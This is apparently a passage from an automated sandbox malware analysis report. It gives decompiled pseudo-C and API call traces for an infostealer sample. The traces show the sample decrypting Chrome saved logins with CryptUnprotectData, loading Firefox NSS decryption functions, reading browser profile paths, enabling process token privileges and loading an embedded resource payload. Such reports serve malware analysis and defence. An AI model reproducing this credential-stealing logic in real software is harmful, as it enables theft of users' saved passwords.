    											_t60 = CreateFileW(_t70, 0x40000000, 2, 0, 3, 0, 0); // executed
    											_t99 = _t60;
    											if(_t99 != 0 && _t99 != 0xffffffff) {
    												_t83 = _t94;
    												_t90 = _t83 + 2;
    												do {
    													_t63 =  *_t83;
    													_t83 = _t83 + 2;
    												} while (_t63 != 0);
    												_v84 = 0;
    												WriteFile(_t99, _t94, (_t83 - _t90 >> 1) + (_t83 - _t90 >> 1),  &_v84, 0); // executed
    												CloseHandle(_t99);
    											}
    											_pop(_t95);
    											_pop(_t100);
    											_pop(_t71);
    											return E01333E82(_t71, _v16 ^ _t103, _t95, _t100);
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    			}

    APIs
    • GetCommandLineW.KERNEL32 ref: 013338DF
    • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 013338F3
      • Part of subcall function 01333790: GetModuleHandleW.KERNEL32(00000000), ref: 013337B0
      • Part of subcall function 01333790: FindResourceW.KERNEL32(00000000,00000065,BMP), ref: 013337CB
      • Part of subcall function 01333790: LoadResource.KERNEL32(00000000,00000000), ref: 013337D9
      • Part of subcall function 01333790: LockResource.KERNEL32(00000000), ref: 013337E4
      • Part of subcall function 01333790: SizeofResource.KERNEL32(00000000,00000000), ref: 013337F3
      • Part of subcall function 01333570: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,01333808), ref: 01333581
      • Part of subcall function 01333570: RtlAllocateHeap.NTDLL(00000000), ref: 01333588
      • Part of subcall function 013335E0: GetCurrentProcess.KERNEL32(000F01FF,?), ref: 0133360E
      • Part of subcall function 013335E0: OpenProcessToken.ADVAPI32(00000000), ref: 01333615
      • Part of subcall function 013335E0: GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 0133364F
      • Part of subcall function 013335E0: GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenIntegrityLevel),00000000,?,?), ref: 01333687
      • Part of subcall function 013335E0: LookupPrivilegeNameW.ADVAPI32(00000000,00000004,?,00000104), ref: 013336D1
      • Part of subcall function 013335E0: AdjustTokenPrivileges.ADVAPI32(FFFFFFFF,00000000,?,00000010,00000000,00000000), ref: 01333748
      • Part of subcall function 013335E0: CloseHandle.KERNEL32(FFFFFFFF), ref: 01333774
    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000003,00000000,00000000), ref: 01333A36
    • WriteFile.KERNEL32(00000000,<NULL>,?,?,00000000), ref: 01333A74
    • CloseHandle.KERNEL32(00000000), ref: 01333A7B
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd

    Control-flow Graph

    C-Code - Quality: 74%
    			E013335E0() {
    				signed int _v8;
    				short _v532;
    				int _v536;
    				struct _TOKEN_PRIVILEGES _v548;
    				void* _v552;
    				long _v556;
    				long _v560;
    				long _v568;
    				long _v572;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t28;
    				int _t34;
    				int _t40;
    				int _t46;
    				void* _t52;
    				void* _t53;
    				void* _t54;
    				void* _t59;
    				void* _t60;
    				struct _LUID* _t62;
    				signed int _t63;
    				void* _t64;
    				void* _t65;
    
    				_t28 =  *0x1347004; // 0x262637d3
    				_v8 = _t28 ^ _t63;
    				_v552 = 0xffffffff;
    				_t61 = 0;
    				if(OpenProcessToken(GetCurrentProcess(), 0xf01ff,  &_v552) != 0) {
    					_t60 = GetTokenInformation;
    					_v556 = 0;
    					_t34 = GetTokenInformation(_v552, 3, 0, 0,  &_v556); // executed
    					if(_t34 == 0) {
    						_push(_v556);
    						_t52 = E01336EBC(_t53);
    						_t65 = _t64 + 4;
    						if(_t52 != 0) {
    							_t40 = GetTokenInformation(_v552, 3, _t52, _v556,  &_v556); // executed
    							if(_t40 != 0) {
    								_t60 = 0;
    								if( *_t52 > 0) {
    									_t12 = _t52 + 4; // 0x4
    									_t62 = _t12;
    									do {
    										E01336200(_t60,  &_v532, 0, 0x208);
    										_t65 = _t65 + 0xc;
    										_v560 = 0x104;
    										_t46 = LookupPrivilegeNameW(0, _t62,  &_v532,  &_v560); // executed
    										if(_t46 != 0 &&  *((intOrPtr*)(_t62 + 8)) == 0) {
    											asm("xorps xmm0, xmm0");
    											_v572 = _t62->LowPart;
    											asm("movq [ebp-0x234], xmm0");
    											_v568 = _t62->HighPart;
    											asm("movq [ebp-0x21c], xmm0");
    											asm("movq xmm0, [ebp-0x238]");
    											_v536 = 0;
    											_v548.PrivilegeCount = 1;
    											asm("movq [ebp-0x21c], xmm0");
    											_v536 = 2;
    											AdjustTokenPrivileges(_v552, 0,  &_v548, 0x10, 0, 0);
    										}
    										_t60 = _t60 + 1;
    										_t62 = _t62 + 0xc;
    									} while (_t60 <  *_t52);
    								}
    								_t61 = 1;
    							}
    							E01336EB7(_t52);
    						}
    					}
    					_t54 = _v552;
    					if(_t54 != 0xffffffff) {
    						CloseHandle(_t54);
    					}
    					return E01333E82(_t52, _v8 ^ _t63, _t60, _t61);
    				} else {
    					return E01333E82(_t52, _v8 ^ _t63, _t59, 0);
    				}
    			}

    APIs
    • GetCurrentProcess.KERNEL32(000F01FF,?), ref: 0133360E
    • OpenProcessToken.ADVAPI32(00000000), ref: 01333615
    • GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 0133364F
    • GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenIntegrityLevel),00000000,?,?), ref: 01333687
    • LookupPrivilegeNameW.ADVAPI32(00000000,00000004,?,00000104), ref: 013336D1
    • AdjustTokenPrivileges.ADVAPI32(FFFFFFFF,00000000,?,00000010,00000000,00000000), ref: 01333748
    • CloseHandle.KERNEL32(FFFFFFFF), ref: 01333774
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 10001FEC
    • lstrlenA.KERNEL32(?), ref: 10001FF9
    • lstrlenA.KERNEL32(\Google\Chrome\User Data\Default\Login Data), ref: 1000200C
      • Part of subcall function 10001D60: GetFileAttributesA.KERNELBASE ref: 10001D8C
      • Part of subcall function 10001D60: GetTempPathA.KERNEL32(00000105,?), ref: 10001DD3
      • Part of subcall function 10001D60: GetTempFileNameA.KERNEL32(?,chr,00000000,?), ref: 10001DED
      • Part of subcall function 10001D60: CopyFileA.KERNEL32(?,?,00000000), ref: 10001DFB
      • Part of subcall function 10001D60: CryptUnprotectData.CRYPT32(?), ref: 10001F00
      • Part of subcall function 10001D60: HeapAlloc.KERNEL32(00000008,-00000064), ref: 10001F1E
      • Part of subcall function 10001D60: LocalFree.KERNEL32(?,00000000,?,00000000), ref: 10001F38
      • Part of subcall function 10001D60: HeapFree.KERNEL32(00000000,00000000,?), ref: 10001F5E
      • Part of subcall function 10001D60: DeleteFileA.KERNELBASE(?,?,?,?,?,?,?,?,00000000), ref: 10001F79
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
      • Part of subcall function 10011D60: __alldiv.INT64 ref: 10011E60
    • __alldiv.INT64 ref: 10019D6E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    • GetSystemInfo.KERNELBASE(100A23D4,100042AC,?,?,1007DF41,?,?,?,?,?,?,100017B0,00000006,00000000,?,00000000), ref: 1000D410
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 100%
    			E013347F1() {
    				_Unknown_base(*)()* _t1;
    
    				_t1 = SetUnhandledExceptionFilter(E013347FD); // executed
    				return _t1;
    			}

    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_000047FD), ref: 013347F6
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd

    Control-flow Graph

    APIs
    • LoadLibraryA.KERNEL32(nss3.dll), ref: 100015B6
    • GetProcAddress.KERNEL32(00000000,NSS_Init,?), ref: 100015D3
    • GetProcAddress.KERNEL32(00000000,NSSBase64_DecodeBuffer), ref: 100015E0
    • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 100015ED
    • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 100015FA
    • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 10001607
    • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 10001614
    • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 10001621
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd

    Control-flow Graph

    APIs
    • RegOpenKeyExA.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,?,?), ref: 100823F6
    • RegEnumKeyA.ADVAPI32(?,00000000,?,00001000), ref: 1008241E
    • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?,?,00000000,00001000,?,00000000,00001000,00000000,?,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000), ref: 10082470
    • RegQueryValueExA.KERNEL32(?,DisplayName,00000000,00000000,?,?,?,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,?,?), ref: 100824A5
    • StrStrIA.SHLWAPI(?,firefox), ref: 100824CA
    • RegQueryValueExA.KERNEL32(?,InstallLocation,00000000,00000000,?,?), ref: 100824FB
    • RegQueryValueExA.ADVAPI32(?,UninstallString,00000000,00000000,?,00001000), ref: 10082534
    • RegEnumKeyA.ADVAPI32(?,00000001,?,00001000), ref: 10082556
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    • lstrlenA.KERNEL32(?), ref: 1008259F
      • Part of subcall function 10081EB0: HeapReAlloc.KERNEL32(00000008,?,00000032,00000000,771CBFF8,?,?,10001039,<STARTCRED>,00000000,00000000), ref: 10081EDC
      • Part of subcall function 10081EB0: HeapAlloc.KERNEL32(00000008,00000032,00000000,771CBFF8,?,?,10001039,<STARTCRED>,00000000,00000000), ref: 10081EEC
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd

    Control-flow Graph

    APIs
    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 10001B02
    • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10001B0F
    • lstrlenA.KERNEL32(\Mozilla\Firefox\,?,?,?,?,?,?,?,00000000), ref: 10001B22
      • Part of subcall function 100821C0: wvnsprintfA.SHLWAPI(?,?,?,?), ref: 100821E8
      • Part of subcall function 100821C0: lstrlenA.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,10001B55,?,00000105,%s\profiles.ini,?,?,\Mozilla\Firefox\), ref: 100821F9
    • GetPrivateProfileStringA.KERNEL32(Profile0,Path,10094D91,?,00000105,?), ref: 10001B7A
    • wsprintfA.USER32 ref: 10001BAF
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd

    Control-flow Graph

    APIs
    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 1000C93E
    Strings
    • cannot open file, xrefs: 1000C9B6
    • 424a0d380332858ee55bdebc4af3789f74e70a2b3ba1cf29d84b9b4bcf3e2e37, xrefs: 1000C9AC
    • psow, xrefs: 1000CA2D
    • %s at line %d of [%.10s], xrefs: 1000C9BB
    • delayed %dms for lock/sharing conflict at line %d, xrefs: 1000C8AA
    • winOpen, xrefs: 1000C8D1
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd

    Control-flow Graph

    C-Code - Quality: 95%
    			E01333790(void* __ecx, WCHAR** _a4) {
    				void* _v8;
    				struct HINSTANCE__* _t7;
    				struct HRSRC__* _t8;
    				void* _t10;
    				void* _t11;
    				struct HRSRC__* _t17;
    				struct HINSTANCE__* _t24;
    				WCHAR* _t26;
    				WCHAR** _t30;
    
    				_push(__ecx);
    				_t30 = _a4;
    				if(_t30 == 0) {
    					return 0;
    				} else {
    					_t30[1] = 0;
    					 *_t30 = 0;
    					_t7 = GetModuleHandleW(0);
    					_t24 = _t7;
    					if(_t24 != 0) {
    						_t8 = FindResourceW(_t24, 0x65, "BMP"); // executed
    						_t17 = _t8;
    						if(_t17 == 0) {
    							L8:
    							return 0;
    						} else {
    							_t10 = LoadResource(_t24, _t17);
    							if(_t10 == 0) {
    								goto L8;
    							} else {
    								_t11 = LockResource(_t10);
    								_v8 = _t11;
    								if(_t11 == 0) {
    									goto L8;
    								} else {
    									_t26 = SizeofResource(_t24, _t17);
    									if(_t26 == 0 || E01333570(_t26, _t30) == 0) {
    										goto L8;
    									} else {
    										E0133F490( *_t30, _v8, _t26);
    										_t30[1] = _t26;
    										return 1;
    									}
    								}
    							}
    						}
    					} else {
    						return _t7;
    					}
    				}
    			}

    APIs
    • GetModuleHandleW.KERNEL32(00000000), ref: 013337B0
    • FindResourceW.KERNEL32(00000000,00000065,BMP), ref: 013337CB
    • LoadResource.KERNEL32(00000000,00000000), ref: 013337D9
    • LockResource.KERNEL32(00000000), ref: 013337E4
    • SizeofResource.KERNEL32(00000000,00000000), ref: 013337F3
      • Part of subcall function 01333570: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,01333808), ref: 01333581
      • Part of subcall function 01333570: RtlAllocateHeap.NTDLL(00000000), ref: 01333588
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd

    Control-flow Graph

    APIs
    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 10081E04
    • CloseHandle.KERNEL32(00000000), ref: 10081E22
    • GetFileSize.KERNEL32(00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,100018BC), ref: 10081E2D
    • CreateFileMappingA.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 10081E40
    • MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,100018BC), ref: 10081E55
    • CloseHandle.KERNEL32(00000000), ref: 10081E64
    • CloseHandle.KERNEL32(00000000), ref: 10081E67
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd

    Control-flow Graph

    C-Code - Quality: 69%
    			E0133CF5F(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
    				signed int _v8;
    				int _v12;
    				void* _v24;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t49;
    				signed int _t54;
    				int _t58;
    				signed int _t60;
    				short* _t62;
    				signed int _t66;
    				short* _t70;
    				int _t71;
    				int _t78;
    				void* _t80;
    				short* _t81;
    				signed int _t87;
    				signed int _t90;
    				void* _t95;
    				void* _t96;
    				int _t98;
    				void* _t99;
    				short* _t101;
    				int _t103;
    				void* _t104;
    				signed int _t106;
    				short* _t107;
    				void* _t110;
    
    				_push(__ecx);
    				_push(__ecx);
    				_t49 =  *0x1347004; // 0x262637d3
    				_v8 = _t49 ^ _t106;
    				_t103 = _a20;
    				if(_t103 > 0) {
    					_t78 = E0133D516(_a16, _t103);
    					_t110 = _t78 - _t103;
    					_t4 = _t78 + 1; // 0x1
    					_t103 = _t4;
    					if(_t110 >= 0) {
    						_t103 = _t78;
    					}
    				}
    				_t98 = _a32;
    				if(_t98 == 0) {
    					_t98 =  *( *_a4 + 8);
    					_a32 = _t98;
    				}
    				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
    				_v12 = _t54;
    				if(_t54 == 0) {
    					L38:
    					_pop(_t99);
    					_pop(_t104);
    					_pop(_t80);
    					return E01333E82(_t80, _v8 ^ _t106, _t99, _t104);
    				} else {
    					_t95 = _t54 + _t54;
    					_t85 = _t95 + 8;
    					asm("sbb eax, eax");
    					if((_t95 + 0x00000008 & _t54) == 0) {
    						_t81 = 0;
    						__eflags = 0;
    						L14:
    						if(_t81 == 0) {
    							L36:
    							_t105 = 0;
    							L37:
    							E0133B1A0(_t81);
    							goto L38;
    						}
    						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
    						_t121 = _t58;
    						if(_t58 == 0) {
    							goto L36;
    						}
    						_t100 = _v12;
    						_t60 = E0133A942(_t81, _t85, _v12, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
    						_t105 = _t60;
    						if(_t105 == 0) {
    							goto L36;
    						}
    						if((_a12 & 0x00000400) == 0) {
    							_t96 = _t105 + _t105;
    							_t87 = _t96 + 8;
    							__eflags = _t96 - _t87;
    							asm("sbb eax, eax");
    							__eflags = _t87 & _t60;
    							if((_t87 & _t60) == 0) {
    								_t101 = 0;
    								__eflags = 0;
    								L30:
    								__eflags = _t101;
    								if(__eflags == 0) {
    									L35:
    									E0133B1A0(_t101);
    									goto L36;
    								}
    								_t62 = E0133A942(_t81, _t87, _t101, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
    								__eflags = _t62;
    								if(_t62 == 0) {
    									goto L35;
    								}
    								_push(0);
    								_push(0);
    								__eflags = _a28;
    								if(_a28 != 0) {
    									_push(_a28);
    									_push(_a24);
    								} else {
    									_push(0);
    									_push(0);
    								}
    								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
    								__eflags = _t105;
    								if(_t105 != 0) {
    									E0133B1A0(_t101);
    									goto L37;
    								} else {
    									goto L35;
    								}
    							}
    							_t90 = _t96 + 8;
    							__eflags = _t96 - _t90;
    							asm("sbb eax, eax");
    							_t66 = _t60 & _t90;
    							_t87 = _t96 + 8;
    							__eflags = _t66 - 0x400;
    							if(_t66 > 0x400) {
    								__eflags = _t96 - _t87;
    								asm("sbb eax, eax");
    								_t101 = E0133883E(_t87, _t66 & _t87);
    								_pop(_t87);
    								__eflags = _t101;
    								if(_t101 == 0) {
    									goto L35;
    								}
    								 *_t101 = 0xdddd;
    								L28:
    								_t101 =  &(_t101[4]);
    								goto L30;
    							}
    							__eflags = _t96 - _t87;
    							asm("sbb eax, eax");
    							E0133F280();
    							_t101 = _t107;
    							__eflags = _t101;
    							if(_t101 == 0) {
    								goto L35;
    							}
    							 *_t101 = 0xcccc;
    							goto L28;
    						}
    						_t70 = _a28;
    						if(_t70 == 0) {
    							goto L37;
    						}
    						_t125 = _t105 - _t70;
    						if(_t105 > _t70) {
    							goto L36;
    						}
    						_t71 = E0133A942(_t81, 0, _t100, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
    						_t105 = _t71;
    						if(_t71 != 0) {
    							goto L37;
    						}
    						goto L36;
    					}
    					asm("sbb eax, eax");
    					_t72 = _t54 & _t95 + 0x00000008;
    					_t85 = _t95 + 8;
    					if((_t54 & _t95 + 0x00000008) > 0x400) {
    						__eflags = _t95 - _t85;
    						asm("sbb eax, eax");
    						_t81 = E0133883E(_t85, _t72 & _t85);
    						_pop(_t85);
    						__eflags = _t81;
    						if(__eflags == 0) {
    							goto L36;
    						}
    						 *_t81 = 0xdddd;
    						L12:
    						_t81 =  &(_t81[4]);
    						goto L14;
    					}
    					asm("sbb eax, eax");
    					E0133F280();
    					_t81 = _t107;
    					if(_t81 == 0) {
    						goto L36;
    					}
    					 *_t81 = 0xcccc;
    					goto L12;
    				}
    			}

    0x0133cf64
    0x0133cf65
    0x0133cf66
    0x0133cf6d
    0x0133cf72
    0x0133cf78
    0x0133cf7e
    0x0133cf84
    0x0133cf87
    0x0133cf87
    0x0133cf8a
    0x0133cf8c
    0x0133cf8c
    0x0133cf8a
    0x0133cf8e
    0x0133cf93
    0x0133cf9a
    0x0133cf9d
    0x0133cf9d
    0x0133cfb9
    0x0133cfbf
    0x0133cfc4
    0x0133d157
    0x0133d15a
    0x0133d15b
    0x0133d15c
    0x0133d16a
    0x0133cfca
    0x0133cfca
    0x0133cfcd
    0x0133cfd2
    0x0133cfd6
    0x0133d02a
    0x0133d02a
    0x0133d02c
    0x0133d02e
    0x0133d14c
    0x0133d14c
    0x0133d14e
    0x0133d14f
    0x00000000
    0x0133d155
    0x0133d03f
    0x0133d045
    0x0133d047
    0x00000000
    0x00000000
    0x0133d04d
    0x0133d05f
    0x0133d064
    0x0133d068
    0x00000000
    0x00000000
    0x0133d075
    0x0133d0af
    0x0133d0b2
    0x0133d0b5
    0x0133d0b7
    0x0133d0b9
    0x0133d0bb
    0x0133d107
    0x0133d107
    0x0133d109
    0x0133d109
    0x0133d10b
    0x0133d145
    0x0133d146
    0x00000000
    0x0133d14b
    0x0133d11f
    0x0133d124
    0x0133d126
    0x00000000
    0x00000000
    0x0133d12a
    0x0133d12b
    0x0133d12c
    0x0133d12f
    0x0133d16b
    0x0133d16e
    0x0133d131
    0x0133d131
    0x0133d132
    0x0133d132
    0x0133d13f
    0x0133d141
    0x0133d143
    0x0133d174
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0133d143
    0x0133d0bd
    0x0133d0c0
    0x0133d0c2
    0x0133d0c4
    0x0133d0c6
    0x0133d0c9
    0x0133d0ce
    0x0133d0e9
    0x0133d0eb
    0x0133d0f5
    0x0133d0f7
    0x0133d0f8
    0x0133d0fa
    0x00000000
    0x00000000
    0x0133d0fc
    0x0133d102
    0x0133d102
    0x00000000
    0x0133d102
    0x0133d0d0
    0x0133d0d2
    0x0133d0d6
    0x0133d0db
    0x0133d0dd
    0x0133d0df
    0x00000000
    0x00000000
    0x0133d0e1
    0x00000000
    0x0133d0e1
    0x0133d077
    0x0133d07c
    0x00000000
    0x00000000
    0x0133d082
    0x0133d084
    0x00000000
    0x00000000
    0x0133d09b
    0x0133d0a0
    0x0133d0a4
    0x00000000
    0x00000000
    0x00000000
    0x0133d0aa
    0x0133cfdd
    0x0133cfdf
    0x0133cfe1
    0x0133cfe9
    0x0133d008
    0x0133d00a
    0x0133d014
    0x0133d016
    0x0133d017
    0x0133d019
    0x00000000
    0x00000000
    0x0133d01f
    0x0133d025
    0x0133d025
    0x00000000
    0x0133d025
    0x0133cfed
    0x0133cff1
    0x0133cff6
    0x0133cffa
    0x00000000
    0x00000000
    0x0133d000
    0x00000000
    0x0133d000

    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,0133D1B0,?,?,00000000), ref: 0133CFB9
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,0133D1B0,?,?,00000000,?,?,?), ref: 0133D03F
      • Part of subcall function 0133A942: LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0133A9B3
      • Part of subcall function 0133883E: RtlAllocateHeap.NTDLL(00000000,01332133,?,?,01332133,?), ref: 01338870
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0133D139
    • __freea.LIBCMT ref: 0133D146
    • __freea.LIBCMT ref: 0133D14F
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    • __freea.LIBCMT ref: 0133D174
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
